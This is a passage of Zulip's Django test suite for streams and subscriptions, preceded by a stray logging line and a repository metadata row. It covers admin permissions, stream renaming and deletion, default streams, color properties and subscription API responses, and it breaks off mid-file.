LOG.debug("Dropped root privileges, now running as \'nobody\'")
| gpl-3.0 |
fw1121/zulip | zerver/test_subs.py | 113 | 63624 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from zerver.lib import cache
from zerver.lib.test_helpers import (
AuthedTestCase, queries_captured, stub, tornado_redirected_to_list
)
from zerver.decorator import (
JsonableError
)
from zerver.lib.test_runner import (
slow
)
from zerver.models import (
get_display_recipient, Message, Realm, Recipient, Stream, Subscription,
UserProfile,
)
from zerver.lib.actions import (
create_stream_if_needed, do_add_default_stream, do_add_subscription,
do_change_is_admin, do_remove_default_stream, gather_subscriptions,
get_default_streams_for_realm, get_realm, get_stream,
get_user_profile_by_email, set_default_streams,
)
import random
import ujson
import urllib
class StreamAdminTest(AuthedTestCase):
def test_make_stream_public(self):
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
stream, _ = create_stream_if_needed(realm, 'private_stream', invite_only=True)
do_change_is_admin(user_profile, True)
params = {
'stream_name': 'private_stream'
}
result = self.client.post("/json/make_stream_public", params)
self.assert_json_error(result, 'You are not invited to this stream.')
do_add_subscription(user_profile, stream)
do_change_is_admin(user_profile, True)
params = {
'stream_name': 'private_stream'
}
result = self.client.post("/json/make_stream_public", params)
self.assert_json_success(result)
stream = Stream.objects.get(name='private_stream', realm=realm)
self.assertFalse(stream.invite_only)
def test_make_stream_private(self):
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
stream, _ = create_stream_if_needed(realm, 'public_stream')
do_change_is_admin(user_profile, True)
params = {
'stream_name': 'public_stream'
}
result = self.client.post("/json/make_stream_private", params)
self.assert_json_success(result)
stream = Stream.objects.get(name='public_stream', realm=realm)
self.assertTrue(stream.invite_only)
def test_deactivate_stream_backend(self):
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
stream, _ = create_stream_if_needed(realm, 'new_stream')
do_add_subscription(user_profile, stream, no_log=True)
do_change_is_admin(user_profile, True)
result = self.client.delete('/json/streams/new_stream')
self.assert_json_success(result)
subscription_exists = Subscription.objects.filter(
user_profile=user_profile,
recipient__type_id=stream.id,
recipient__type=Recipient.STREAM,
active=True,
).exists()
self.assertFalse(subscription_exists)
def test_deactivate_stream_backend_requires_realm_admin(self):
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
stream, _ = create_stream_if_needed(realm, 'new_stream')
do_add_subscription(user_profile, stream, no_log=True)
result = self.client.delete('/json/streams/new_stream')
self.assert_json_error(result, 'Must be a realm administrator')
def test_rename_stream(self):
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
stream, _ = create_stream_if_needed(realm, 'stream_name1')
do_add_subscription(user_profile, stream, no_log=True)
do_change_is_admin(user_profile, True)
events = []
with tornado_redirected_to_list(events):
result = self.client.post('/json/rename_stream?old_name=stream_name1&new_name=stream_name2')
self.assert_json_success(result)
event = events[1]['event']
self.assertEqual(event, dict(
op='update',
type='stream',
property='name',
value='stream_name2',
name='stream_name1'
))
users = events[1]['users']
self.assertEqual(users, [user_profile.id])
stream_name1_exists = Stream.objects.filter(
name='stream_name1',
realm=realm,
).exists()
self.assertFalse(stream_name1_exists)
stream_name2_exists = Stream.objects.filter(
name='stream_name2',
realm=realm,
).exists()
self.assertTrue(stream_name2_exists)
def test_rename_stream_requires_realm_admin(self):
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
stream, _ = create_stream_if_needed(realm, 'stream_name1')
result = self.client.post('/json/rename_stream?old_name=stream_name1&new_name=stream_name2')
self.assert_json_error(result, 'Must be a realm administrator')
def test_change_stream_description(self):
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
stream, _ = create_stream_if_needed(realm, 'stream_name1')
do_add_subscription(user_profile, stream, no_log=True)
do_change_is_admin(user_profile, True)
events = []
with tornado_redirected_to_list(events):
result = self.client_patch('/json/streams/stream_name1',
{'description': ujson.dumps('Test description')})
self.assert_json_success(result)
event = events[0]['event']
self.assertEqual(event, dict(
op='update',
type='stream',
property='description',
value='Test description',
name='stream_name1'
))
users = events[0]['users']
self.assertEqual(users, [user_profile.id])
stream = Stream.objects.get(
name='stream_name1',
realm=realm,
)
self.assertEqual('Test description', stream.description)
def test_change_stream_description_requires_realm_admin(self):
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
stream, _ = create_stream_if_needed(realm, 'stream_name1')
do_add_subscription(user_profile, stream, no_log=True)
do_change_is_admin(user_profile, False)
result = self.client_patch('/json/streams/stream_name1',
{'description': ujson.dumps('Test description')})
self.assert_json_error(result, 'Must be a realm administrator')
def set_up_stream_for_deletion(self, stream_name, invite_only=False,
subscribed=True):
"""
Create a stream for deletion by an administrator.
"""
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
stream, _ = create_stream_if_needed(user_profile.realm, stream_name,
invite_only=invite_only)
# For testing deleting streams you aren't on.
if subscribed:
do_add_subscription(user_profile, stream, no_log=True)
do_change_is_admin(user_profile, True)
return stream
def delete_stream(self, stream, subscribed=True):
"""
Delete the stream and assess the result.
"""
active_name = stream.name
events = []
with tornado_redirected_to_list(events):
result = self.client.delete('/json/streams/' + active_name)
self.assert_json_success(result)
deletion_events = [e['event'] for e in events if e['event']['type'] == 'subscription']
if subscribed:
self.assertEqual(deletion_events[0], dict(
op='remove',
type='subscription',
subscriptions=[{'name': active_name, 'stream_id': stream.id}]
))
else:
# You could delete the stream, but you weren't on it so you don't
# receive an unsubscription event.
self.assertEqual(deletion_events, [])
with self.assertRaises(Stream.DoesNotExist):
Stream.objects.get(realm=get_realm("zulip.com"), name=active_name)
# A deleted stream's name is changed, is deactivated, is invite-only,
# and has no subscribers.
deactivated_stream_name = "!DEACTIVATED:" + active_name
deactivated_stream = Stream.objects.get(name=deactivated_stream_name)
self.assertTrue(deactivated_stream.deactivated)
self.assertTrue(deactivated_stream.invite_only)
self.assertEqual(deactivated_stream.name, deactivated_stream_name)
subscribers = self.users_subscribed_to_stream(
deactivated_stream_name, "zulip.com")
self.assertEqual(subscribers, [])
# It doesn't show up in the list of public streams anymore.
result = self.client.post("/json/get_public_streams")
public_streams = [s["name"] for s in ujson.loads(result.content)["streams"]]
self.assertNotIn(active_name, public_streams)
self.assertNotIn(deactivated_stream_name, public_streams)
# Even if you could guess the new name, you can't subscribe to it.
result = self.client.post(
"/json/subscriptions/add",
{"subscriptions": ujson.dumps([{"name": deactivated_stream_name}])})
self.assert_json_error(
result, "Unable to access stream (%s)." % (deactivated_stream_name,))
def test_delete_public_stream(self):
"""
When an administrator deletes a public stream, that stream is not
visible to users at all anymore.
"""
stream = self.set_up_stream_for_deletion("newstream")
self.delete_stream(stream)
def test_delete_private_stream(self):
"""
Administrators can delete private streams they are on.
"""
stream = self.set_up_stream_for_deletion("newstream", invite_only=True)
self.delete_stream(stream)
def test_delete_streams_youre_not_on(self):
"""
Administrators can delete public streams they aren't on, but cannot
delete private streams they aren't on.
"""
pub_stream = self.set_up_stream_for_deletion(
"pubstream", subscribed=False)
self.delete_stream(pub_stream, subscribed=False)
priv_stream = self.set_up_stream_for_deletion(
"privstream", subscribed=False, invite_only=True)
result = self.client.delete('/json/streams/' + priv_stream.name)
self.assert_json_error(
result, "Cannot administer invite-only streams this way")
def attempt_unsubscribe_of_principal(self, is_admin=False, is_subbed=True,
invite_only=False, other_user_subbed=True):
# Set up the main user, who is in most cases an admin.
email = "hamlet@zulip.com"
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
if is_admin:
do_change_is_admin(user_profile, True)
# Set up the stream.
stream_name = u"hümbüǵ"
stream, _ = create_stream_if_needed(realm, stream_name,
invite_only=invite_only)
# Set up the principal to be unsubscribed.
other_email = "cordelia@zulip.com"
other_user_profile = get_user_profile_by_email(other_email)
# Subscribe the admin and/or principal as specified in the flags.
if is_subbed:
do_add_subscription(user_profile, stream, no_log=True)
if other_user_subbed:
do_add_subscription(other_user_profile, stream, no_log=True)
result = self.client.post(
"/json/subscriptions/remove",
{"subscriptions": ujson.dumps([stream.name]),
"principals": ujson.dumps([other_email])})
# If the removal succeeded, then assert that Cordelia is no longer subscribed.
if result.status_code not in [400]:
subbed_users = self.users_subscribed_to_stream(stream_name, other_user_profile.realm.domain)
self.assertNotIn(other_user_profile, subbed_users)
return result
def test_cant_remove_others_from_stream(self):
"""
If you're not an admin, you can't remove other people from streams.
"""
result = self.attempt_unsubscribe_of_principal(
is_admin=False, is_subbed=True, invite_only=False,
other_user_subbed=True)
self.assert_json_error(
result, "This action requires administrative rights")
def test_admin_remove_others_from_public_stream(self):
"""
If you're an admin, you can remove people from public streams, even
those you aren't on.
"""
result = self.attempt_unsubscribe_of_principal(
is_admin=True, is_subbed=True, invite_only=False,
other_user_subbed=True)
json = self.assert_json_success(result)
self.assertEqual(len(json["removed"]), 1)
self.assertEqual(len(json["not_subscribed"]), 0)
def test_admin_remove_others_from_subbed_private_stream(self):
"""
If you're an admin, you can remove other people from private streams you
are on.
"""
result = self.attempt_unsubscribe_of_principal(
is_admin=True, is_subbed=True, invite_only=True,
other_user_subbed=True)
json = self.assert_json_success(result)
self.assertEqual(len(json["removed"]), 1)
self.assertEqual(len(json["not_subscribed"]), 0)
def test_admin_remove_others_from_unsubbed_private_stream(self):
"""
Even if you're an admin, you can't remove people from private
streams you aren't on.
"""
result = self.attempt_unsubscribe_of_principal(
is_admin=True, is_subbed=False, invite_only=True,
other_user_subbed=True)
self.assert_json_error(
result, "Cannot administer invite-only streams this way")
def test_remove_already_not_subbed(self):
"""
Trying to unsubscribe someone who already isn't subscribed to a stream
fails gracefully.
"""
result = self.attempt_unsubscribe_of_principal(
is_admin=True, is_subbed=False, invite_only=False,
other_user_subbed=False)
json = self.assert_json_success(result)
self.assertEqual(len(json["removed"]), 0)
self.assertEqual(len(json["not_subscribed"]), 1)
def test_remove_invalid_user(self):
"""
Trying to unsubscribe an invalid user from a stream fails gracefully.
"""
admin_email = "hamlet@zulip.com"
self.login(admin_email)
user_profile = get_user_profile_by_email(admin_email)
do_change_is_admin(user_profile, True)
realm = user_profile.realm
stream_name = u"hümbüǵ"
stream, _ = create_stream_if_needed(realm, stream_name)
result = self.client.post("/json/subscriptions/remove",
{"subscriptions": ujson.dumps([stream.name]),
"principals": ujson.dumps(["baduser@zulip.com"])})
self.assert_json_error(
result,
"User not authorized to execute queries on behalf of 'baduser@zulip.com'")
class DefaultStreamTest(AuthedTestCase):
def get_default_stream_names(self, realm):
streams = get_default_streams_for_realm(realm)
stream_names = [s.name for s in streams]
return set(stream_names)
def test_set_default_streams(self):
realm = Realm.objects.get(domain="zulip.com")
stream_names = ['apple', 'banana', 'Carrot Cake']
expected_names = stream_names + ['zulip']
set_default_streams(realm, stream_names)
stream_names = self.get_default_stream_names(realm)
self.assertEqual(stream_names, set(expected_names))
def test_add_and_remove_default_stream(self):
realm = Realm.objects.get(domain="zulip.com")
orig_stream_names = self.get_default_stream_names(realm)
do_add_default_stream(realm, 'Added Stream')
new_stream_names = self.get_default_stream_names(realm)
added_stream_names = new_stream_names - orig_stream_names
self.assertEqual(added_stream_names, set(['Added Stream']))
        # idempotency--2nd call to add_default_stream should be a noop
do_add_default_stream(realm, 'Added Stream')
self.assertEqual(self.get_default_stream_names(realm), new_stream_names)
# start removing
do_remove_default_stream(realm, 'Added Stream')
self.assertEqual(self.get_default_stream_names(realm), orig_stream_names)
        # idempotency--2nd call to remove_default_stream should be a noop
do_remove_default_stream(realm, 'Added Stream')
self.assertEqual(self.get_default_stream_names(realm), orig_stream_names)
def test_api_calls(self):
self.login("hamlet@zulip.com")
user_profile = get_user_profile_by_email('hamlet@zulip.com')
do_change_is_admin(user_profile, True)
stream_name = 'stream ADDED via api'
result = self.client_patch('/json/default_streams', dict(stream_name=stream_name))
self.assert_json_success(result)
self.assertTrue(stream_name in self.get_default_stream_names(user_profile.realm))
# and remove it
result = self.client_delete('/json/default_streams', dict(stream_name=stream_name))
self.assert_json_success(result)
self.assertFalse(stream_name in self.get_default_stream_names(user_profile.realm))
class SubscriptionPropertiesTest(AuthedTestCase):
def test_set_stream_color(self):
"""
A POST request to /json/subscriptions/property with stream_name and
color data sets the stream color, and for that stream only.
"""
test_email = "hamlet@zulip.com"
self.login(test_email)
old_subs, _ = gather_subscriptions(get_user_profile_by_email(test_email))
sub = old_subs[0]
stream_name = sub['name']
new_color = "#ffffff" # TODO: ensure that this is different from old_color
result = self.client.post(
"/json/subscriptions/property",
{"subscription_data": ujson.dumps([{"property": "color",
"stream": stream_name,
"value": "#ffffff"}])})
self.assert_json_success(result)
new_subs = gather_subscriptions(get_user_profile_by_email(test_email))[0]
found_sub = None
for sub in new_subs:
if sub['name'] == stream_name:
found_sub = sub
break
self.assertIsNotNone(found_sub)
self.assertEqual(found_sub['color'], new_color)
new_subs.remove(found_sub)
for sub in old_subs:
if sub['name'] == stream_name:
found_sub = sub
break
old_subs.remove(found_sub)
self.assertEqual(old_subs, new_subs)
def test_set_color_missing_stream_name(self):
"""
Updating the color property requires a `stream` key.
"""
test_email = "hamlet@zulip.com"
self.login(test_email)
result = self.client.post(
"/json/subscriptions/property",
{"subscription_data": ujson.dumps([{"property": "color",
"value": "#ffffff"}])})
self.assert_json_error(
result, "stream key is missing from subscription_data[0]")
def test_set_color_missing_color(self):
"""
Updating the color property requires a color.
"""
test_email = "hamlet@zulip.com"
self.login(test_email)
subs = gather_subscriptions(get_user_profile_by_email(test_email))[0]
result = self.client.post(
"/json/subscriptions/property",
{"subscription_data": ujson.dumps([{"property": "color",
"stream": subs[0]["name"]}])})
self.assert_json_error(
result, "value key is missing from subscription_data[0]")
def test_set_invalid_property(self):
"""
Trying to set an invalid property returns a JSON error.
"""
test_email = "hamlet@zulip.com"
self.login(test_email)
subs = gather_subscriptions(get_user_profile_by_email(test_email))[0]
result = self.client.post(
"/json/subscriptions/property",
{"subscription_data": ujson.dumps([{"property": "bad",
"value": "bad",
"stream": subs[0]["name"]}])})
self.assert_json_error(result,
"Unknown subscription property: bad")
class SubscriptionRestApiTest(AuthedTestCase):
def test_basic_add_delete(self):
email = 'hamlet@zulip.com'
self.login(email)
# add
request = {
'add': ujson.dumps([{'name': 'my_test_stream_1'}])
}
result = self.client_patch(
"/api/v1/users/me/subscriptions",
request,
**self.api_auth(email)
)
self.assert_json_success(result)
streams = self.get_streams(email)
self.assertTrue('my_test_stream_1' in streams)
# now delete the same stream
request = {
'delete': ujson.dumps(['my_test_stream_1'])
}
result = self.client_patch(
"/api/v1/users/me/subscriptions",
request,
**self.api_auth(email)
)
self.assert_json_success(result)
streams = self.get_streams(email)
self.assertTrue('my_test_stream_1' not in streams)
def test_bad_add_parameters(self):
email = 'hamlet@zulip.com'
self.login(email)
def check_for_error(val, expected_message):
request = {
'add': ujson.dumps(val)
}
result = self.client_patch(
"/api/v1/users/me/subscriptions",
request,
**self.api_auth(email)
)
self.assert_json_error(result, expected_message)
check_for_error(['foo'], 'add[0] is not a dict')
check_for_error([{'bogus': 'foo'}], 'name key is missing from add[0]')
check_for_error([{'name': {}}], 'add[0]["name"] is not a string')
def test_bad_principals(self):
email = 'hamlet@zulip.com'
self.login(email)
request = {
'add': ujson.dumps([{'name': 'my_new_stream'}]),
'principals': ujson.dumps([{}]),
}
result = self.client_patch(
"/api/v1/users/me/subscriptions",
request,
**self.api_auth(email)
)
self.assert_json_error(result, 'principals[0] is not a string')
def test_bad_delete_parameters(self):
email = 'hamlet@zulip.com'
self.login(email)
request = {
'delete': ujson.dumps([{'name': 'my_test_stream_1'}])
}
result = self.client_patch(
"/api/v1/users/me/subscriptions",
request,
**self.api_auth(email)
)
self.assert_json_error(result, "delete[0] is not a string")
class SubscriptionAPITest(AuthedTestCase):
def setUp(self):
"""
All tests will be logged in as hamlet. Also save various useful values
as attributes that tests can access.
"""
self.test_email = "hamlet@zulip.com"
self.login(self.test_email)
self.user_profile = get_user_profile_by_email(self.test_email)
self.realm = self.user_profile.realm
self.streams = self.get_streams(self.test_email)
def make_random_stream_names(self, existing_stream_names):
"""
Helper function to make up random stream names. It takes
existing_stream_names and randomly appends a digit to the end of each,
but avoids names that appear in the list names_to_avoid.
"""
random_streams = []
all_stream_names = [stream.name for stream in Stream.objects.filter(realm=self.realm)]
for stream in existing_stream_names:
random_stream = stream + str(random.randint(0, 9))
            if random_stream not in all_stream_names:
random_streams.append(random_stream)
return random_streams
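    # For illustration (hypothetical outcome):
    # self.make_random_stream_names(['Verona']) might return ['Verona3'],
    # dropping any candidate that already names a stream in the realm.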
def test_successful_subscriptions_list(self):
"""
Calling /api/v1/users/me/subscriptions should successfully return your subscriptions.
"""
email = self.test_email
result = self.client.get("/api/v1/users/me/subscriptions", **self.api_auth(email))
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertIn("subscriptions", json)
for stream in json['subscriptions']:
self.assertIsInstance(stream['name'], basestring)
self.assertIsInstance(stream['color'], basestring)
self.assertIsInstance(stream['invite_only'], bool)
# check that the stream name corresponds to an actual stream
try:
Stream.objects.get(name__iexact=stream['name'], realm=self.realm)
except Stream.DoesNotExist:
self.fail("stream does not exist")
list_streams = [stream['name'] for stream in json["subscriptions"]]
# also check that this matches the list of your subscriptions
self.assertItemsEqual(list_streams, self.streams)
def helper_check_subs_before_and_after_add(self, subscriptions, other_params,
subscribed, already_subscribed,
email, new_subs, invite_only=False):
"""
Check result of adding subscriptions.
You can add subscriptions for yourself or possibly many
principals, which is why e-mails map to subscriptions in the
result.
The result json is of the form
{"msg": "",
"result": "success",
"already_subscribed": {"iago@zulip.com": ["Venice", "Verona"]},
"subscribed": {"iago@zulip.com": ["Venice8"]}}
"""
result = self.common_subscribe_to_streams(self.test_email, subscriptions,
other_params, invite_only=invite_only)
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertItemsEqual(subscribed, json["subscribed"][email])
self.assertItemsEqual(already_subscribed, json["already_subscribed"][email])
new_streams = self.get_streams(email)
self.assertItemsEqual(new_streams, new_subs)
def test_successful_subscriptions_add(self):
"""
Calling /json/subscriptions/add should successfully add streams, and
should determine which are new subscriptions vs which were already
subscribed. We randomly generate stream names to add, because it
doesn't matter whether the stream already exists.
"""
self.assertNotEqual(len(self.streams), 0) # necessary for full test coverage
add_streams = self.make_random_stream_names(self.streams)
self.assertNotEqual(len(add_streams), 0) # necessary for full test coverage
events = []
with tornado_redirected_to_list(events):
self.helper_check_subs_before_and_after_add(self.streams + add_streams, {},
add_streams, self.streams, self.test_email, self.streams + add_streams)
self.assert_length(events, 4, True)
def test_successful_subscriptions_notifies_pm(self):
"""
Calling /json/subscriptions/add should notify when a new stream is created.
"""
invitee = "iago@zulip.com"
invitee_full_name = 'Iago'
current_stream = self.get_streams(invitee)[0]
        invite_streams = self.make_random_stream_names([current_stream])[:1]
result = self.common_subscribe_to_streams(
invitee,
invite_streams,
extra_post_data={
'announce': 'true',
'principals': '["%s"]' % (self.user_profile.email,)
},
)
self.assert_json_success(result)
msg = Message.objects.latest('id')
self.assertEqual(msg.recipient.type, Recipient.PERSONAL)
self.assertEqual(msg.sender_id,
get_user_profile_by_email('notification-bot@zulip.com').id)
expected_msg = "Hi there! %s just created a new stream '%s'. " \
"!_stream_subscribe_button(%s)" % (invitee_full_name,
invite_streams[0],
invite_streams[0])
self.assertEqual(msg.content, expected_msg)
def test_successful_subscriptions_notifies_stream(self):
"""
Calling /json/subscriptions/add should notify when a new stream is created.
"""
invitee = "iago@zulip.com"
invitee_full_name = 'Iago'
current_stream = self.get_streams(invitee)[0]
        invite_streams = self.make_random_stream_names([current_stream])[:1]
notifications_stream = Stream.objects.get(name=current_stream, realm=self.realm)
self.realm.notifications_stream = notifications_stream
self.realm.save()
# Delete the UserProfile from the cache so the realm change will be
# picked up
cache.cache_delete(cache.user_profile_by_email_cache_key(invitee))
result = self.common_subscribe_to_streams(
invitee,
invite_streams,
extra_post_data=dict(
announce='true',
principals='["%s"]' % (self.user_profile.email,)
),
)
self.assert_json_success(result)
msg = Message.objects.latest('id')
self.assertEqual(msg.recipient.type, Recipient.STREAM)
self.assertEqual(msg.sender_id,
get_user_profile_by_email('notification-bot@zulip.com').id)
expected_msg = "%s just created a new stream `%s`. " \
"!_stream_subscribe_button(%s)" % (invitee_full_name,
invite_streams[0],
invite_streams[0])
self.assertEqual(msg.content, expected_msg)
def test_successful_subscriptions_notifies_with_escaping(self):
"""
Calling /json/subscriptions/add should notify when a new stream is created.
"""
invitee = "iago@zulip.com"
invitee_full_name = 'Iago'
invite_streams = ['strange ) \\ test']
result = self.common_subscribe_to_streams(
invitee,
invite_streams,
extra_post_data={
'announce': 'true',
'principals': '["%s"]' % (self.user_profile.email,)
},
)
self.assert_json_success(result)
msg = Message.objects.latest('id')
self.assertEqual(msg.sender_id,
get_user_profile_by_email('notification-bot@zulip.com').id)
expected_msg = "Hi there! %s just created a new stream '%s'. " \
"!_stream_subscribe_button(strange \\) \\\\ test)" % (
invitee_full_name,
invite_streams[0])
self.assertEqual(msg.content, expected_msg)
def test_non_ascii_stream_subscription(self):
"""
Subscribing to a stream name with non-ASCII characters succeeds.
"""
self.helper_check_subs_before_and_after_add(self.streams + [u"hümbüǵ"], {},
[u"hümbüǵ"], self.streams, self.test_email, self.streams + [u"hümbüǵ"])
def test_subscriptions_add_too_long(self):
"""
Calling /json/subscriptions/add on a stream whose name is >60
characters should return a JSON error.
"""
# character limit is 60 characters
long_stream_name = "a" * 61
result = self.common_subscribe_to_streams(self.test_email, [long_stream_name])
self.assert_json_error(result,
"Stream name (%s) too long." % (long_stream_name,))
def test_user_settings_for_adding_streams(self):
with stub(UserProfile, 'can_create_streams', lambda self: True):
result = self.common_subscribe_to_streams(self.test_email, ['stream1'])
self.assert_json_success(result)
with stub(UserProfile, 'can_create_streams', lambda self: False):
result = self.common_subscribe_to_streams(self.test_email, ['stream1'])
self.assert_json_error(result, 'User cannot create streams.')
def test_subscriptions_add_invalid_stream(self):
"""
Calling /json/subscriptions/add on a stream whose name is invalid (as
defined by valid_stream_name in zerver/views.py) should return a JSON
error.
"""
# currently, the only invalid name is the empty string
invalid_stream_name = ""
result = self.common_subscribe_to_streams(self.test_email, [invalid_stream_name])
self.assert_json_error(result,
"Invalid stream name (%s)." % (invalid_stream_name,))
def assert_adding_subscriptions_for_principal(self, invitee, streams, invite_only=False):
"""
Calling /json/subscriptions/add on behalf of another principal (for
whom you have permission to add subscriptions) should successfully add
those subscriptions and send a message to the subscribee notifying
them.
"""
other_profile = get_user_profile_by_email(invitee)
current_streams = self.get_streams(invitee)
self.assertIsInstance(other_profile, UserProfile)
self.assertNotEqual(len(current_streams), 0) # necessary for full test coverage
self.assertNotEqual(len(streams), 0) # necessary for full test coverage
streams_to_sub = streams[:1] # just add one, to make the message easier to check
streams_to_sub.extend(current_streams)
self.helper_check_subs_before_and_after_add(streams_to_sub,
{"principals": ujson.dumps([invitee])}, streams[:1], current_streams,
invitee, streams_to_sub, invite_only=invite_only)
# verify that the user was sent a message informing them about the subscription
msg = Message.objects.latest('id')
self.assertEqual(msg.recipient.type, msg.recipient.PERSONAL)
self.assertEqual(msg.sender_id,
get_user_profile_by_email("notification-bot@zulip.com").id)
expected_msg = ("Hi there! We thought you'd like to know that %s just "
"subscribed you to the %sstream [%s](#narrow/stream/%s)."
% (self.user_profile.full_name,
'**invite-only** ' if invite_only else '',
streams[0], urllib.quote(streams[0].encode('utf-8'))))
if not Stream.objects.get(name=streams[0]).invite_only:
expected_msg += ("\nYou can see historical content on a "
"non-invite-only stream by narrowing to it.")
self.assertEqual(msg.content, expected_msg)
recipients = get_display_recipient(msg.recipient)
self.assertEqual(len(recipients), 1)
self.assertEqual(recipients[0]['email'], invitee)
def test_multi_user_subscription(self):
email1 = 'cordelia@zulip.com'
email2 = 'iago@zulip.com'
realm = Realm.objects.get(domain="zulip.com")
streams_to_sub = ['multi_user_stream']
events = []
with tornado_redirected_to_list(events):
with queries_captured() as queries:
self.common_subscribe_to_streams(
self.test_email,
streams_to_sub,
dict(principals=ujson.dumps([email1, email2])),
)
self.assert_length(queries, 43)
self.assert_length(events, 6, exact=True)
for ev in filter(lambda x: x['event']['type'] not in ('message', 'stream'), events):
self.assertEqual(ev['event']['op'], 'add')
self.assertEqual(
set(ev['event']['subscriptions'][0]['subscribers']),
set([email1, email2])
)
stream = get_stream('multi_user_stream', realm)
self.assertEqual(stream.num_subscribers(), 2)
# Now add ourselves
events = []
with tornado_redirected_to_list(events):
with queries_captured() as queries:
self.common_subscribe_to_streams(
self.test_email,
streams_to_sub,
dict(principals=ujson.dumps([self.test_email])),
)
self.assert_length(queries, 8)
self.assert_length(events, 2, True)
add_event, add_peer_event = events
self.assertEqual(add_event['event']['type'], 'subscription')
self.assertEqual(add_event['event']['op'], 'add')
self.assertEqual(add_event['users'], [get_user_profile_by_email(self.test_email).id])
self.assertEqual(
set(add_event['event']['subscriptions'][0]['subscribers']),
set([email1, email2, self.test_email])
)
self.assertEqual(len(add_peer_event['users']), 2)
self.assertEqual(add_peer_event['event']['type'], 'subscription')
self.assertEqual(add_peer_event['event']['op'], 'peer_add')
self.assertEqual(add_peer_event['event']['user_email'], self.test_email)
stream = get_stream('multi_user_stream', realm)
self.assertEqual(stream.num_subscribers(), 3)
# Finally, add othello, exercising the do_add_subscription() code path.
events = []
email3 = 'othello@zulip.com'
user_profile = get_user_profile_by_email(email3)
stream = get_stream('multi_user_stream', realm)
with tornado_redirected_to_list(events):
do_add_subscription(user_profile, stream)
self.assert_length(events, 2, True)
add_event, add_peer_event = events
self.assertEqual(add_event['event']['type'], 'subscription')
self.assertEqual(add_event['event']['op'], 'add')
self.assertEqual(add_event['users'], [get_user_profile_by_email(email3).id])
self.assertEqual(
set(add_event['event']['subscriptions'][0]['subscribers']),
set([email1, email2, email3, self.test_email])
)
self.assertEqual(len(add_peer_event['users']), 3)
self.assertEqual(add_peer_event['event']['type'], 'subscription')
self.assertEqual(add_peer_event['event']['op'], 'peer_add')
self.assertEqual(add_peer_event['event']['user_email'], email3)
def test_bulk_subscribe_MIT(self):
realm = Realm.objects.get(domain="mit.edu")
streams = ["stream_%s" % i for i in xrange(40)]
for stream in streams:
create_stream_if_needed(realm, stream)
events = []
with tornado_redirected_to_list(events):
with queries_captured() as queries:
self.common_subscribe_to_streams(
'starnine@mit.edu',
streams,
dict(principals=ujson.dumps(['starnine@mit.edu'])),
)
# Make sure MIT does not get any tornado subscription events
self.assert_length(events, 0, True)
self.assert_length(queries, 7)
def test_bulk_subscribe_many(self):
# Create a whole bunch of streams
realm = Realm.objects.get(domain="zulip.com")
streams = ["stream_%s" % i for i in xrange(20)]
for stream in streams:
create_stream_if_needed(realm, stream)
with queries_captured() as queries:
self.common_subscribe_to_streams(
self.test_email,
streams,
dict(principals=ujson.dumps([self.test_email])),
)
# Make sure we don't make O(streams) queries
self.assert_length(queries, 9)
@slow(0.15, "common_subscribe_to_streams is slow")
def test_subscriptions_add_for_principal(self):
"""
You can subscribe other people to streams.
"""
invitee = "iago@zulip.com"
current_streams = self.get_streams(invitee)
invite_streams = self.make_random_stream_names(current_streams)
self.assert_adding_subscriptions_for_principal(invitee, invite_streams)
@slow(0.15, "common_subscribe_to_streams is slow")
def test_subscriptions_add_for_principal_invite_only(self):
"""
You can subscribe other people to invite only streams.
"""
invitee = "iago@zulip.com"
current_streams = self.get_streams(invitee)
invite_streams = self.make_random_stream_names(current_streams)
self.assert_adding_subscriptions_for_principal(invitee, invite_streams,
invite_only=True)
@slow(0.15, "common_subscribe_to_streams is slow")
def test_non_ascii_subscription_for_principal(self):
"""
        You can subscribe other people to streams even if the stream
        names contain non-ASCII characters.
"""
self.assert_adding_subscriptions_for_principal("iago@zulip.com", [u"hümbüǵ"])
def test_subscription_add_invalid_principal(self):
"""
Calling subscribe on behalf of a principal that does not exist
should return a JSON error.
"""
invalid_principal = "rosencrantz-and-guildenstern@zulip.com"
# verify that invalid_principal actually doesn't exist
with self.assertRaises(UserProfile.DoesNotExist):
get_user_profile_by_email(invalid_principal)
result = self.common_subscribe_to_streams(self.test_email, self.streams,
{"principals": ujson.dumps([invalid_principal])})
self.assert_json_error(result, "User not authorized to execute queries on behalf of '%s'"
% (invalid_principal,))
def test_subscription_add_principal_other_realm(self):
"""
Calling subscribe on behalf of a principal in another realm
should return a JSON error.
"""
principal = "starnine@mit.edu"
profile = get_user_profile_by_email(principal)
# verify that principal exists (thus, the reason for the error is the cross-realming)
self.assertIsInstance(profile, UserProfile)
result = self.common_subscribe_to_streams(self.test_email, self.streams,
{"principals": ujson.dumps([principal])})
self.assert_json_error(result, "User not authorized to execute queries on behalf of '%s'"
% (principal,))
def helper_check_subs_before_and_after_remove(self, subscriptions, json_dict,
email, new_subs):
"""
Check result of removing subscriptions.
Unlike adding subscriptions, you can only remove subscriptions
for yourself, so the result format is different.
{"msg": "",
"removed": ["Denmark", "Scotland", "Verona"],
"not_subscribed": ["Rome"], "result": "success"}
"""
result = self.client.post("/json/subscriptions/remove",
{"subscriptions": ujson.dumps(subscriptions)})
self.assert_json_success(result)
json = ujson.loads(result.content)
for key, val in json_dict.iteritems():
self.assertItemsEqual(val, json[key]) # we don't care about the order of the items
new_streams = self.get_streams(email)
self.assertItemsEqual(new_streams, new_subs)
def test_successful_subscriptions_remove(self):
"""
Calling /json/subscriptions/remove should successfully remove streams,
and should determine which were removed vs which weren't subscribed to.
We cannot randomly generate stream names because the remove code
verifies whether streams exist.
"""
